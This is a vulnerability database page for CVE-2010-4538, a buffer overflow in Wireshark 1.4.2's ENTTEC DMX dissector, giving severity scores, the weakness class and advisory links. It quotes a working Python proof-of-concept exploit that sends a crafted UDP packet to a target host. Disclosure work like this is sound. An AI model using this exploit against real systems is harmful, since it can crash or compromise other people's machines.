CVE-2010-4538 : Detail

CVE-2010-4538

Overflow
80.26%V3
Network
2011-01-07
17h00 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the sect_enttec_dmx_da function in epan/dissectors/packet-enttec.c in Wireshark 1.4.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted ENTTEC DMX packet with Run Length Encoding (RLE) compression.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 15898

Publication date : 2011-01-02 23h00 +00:00
Author : non-customers crew
EDB Verified : Yes

# source: https://www.securityfocus.com/bid/45634/info #!/usr/bin/env python # Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC # by non-customers crew in 2010 # http://rock-madrid.com/ import socket, sys try: host = sys.argv[1] except: print "usage: " + sys.argv[0] + " <host>" sys.exit(2) port = 3333 addr = (host, port) data = "ESDD\x10\x20\x04" data += "\x00\x0c" data += "\xfe\xff\x41" data += "\xfe\xff\x42" data += "\xfe\xff\x43" data += "\xfe\xff\x44" udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: udps.sendto(data, addr) except: print "can't lookup host" sys.exit(1) udps.close() sys.exit(0)

Products Mentioned

Configuraton 0

Wireshark>>Wireshark >> Version 1.4.2

References

http://www.vupen.com/english/advisories/2011/0053
Tags : vdb-entry, x_refsource_VUPEN
http://openwall.com/lists/oss-security/2010/12/31/7
Tags : mailing-list, x_refsource_MLIST
http://www.vupen.com/english/advisories/2011/0110
Tags : vdb-entry, x_refsource_VUPEN
http://www.mandriva.com/security/advisories?name=MDVSA-2011:002
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.securitytracker.com/id?1024930
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/42853
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/42910
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2011/0008
Tags : vdb-entry, x_refsource_VUPEN
http://openwall.com/lists/oss-security/2011/01/03/8
Tags : mailing-list, x_refsource_MLIST
http://www.securityfocus.com/bid/45634
Tags : vdb-entry, x_refsource_BID
http://osvdb.org/70244
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/42767
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2011/0079
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2011-0013.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2011/0069
Tags : vdb-entry, x_refsource_VUPEN
http://www.debian.org/security/2011/dsa-2144
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.vupen.com/english/advisories/2011/0099
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/42914
Tags : third-party-advisory, x_refsource_SECUNIA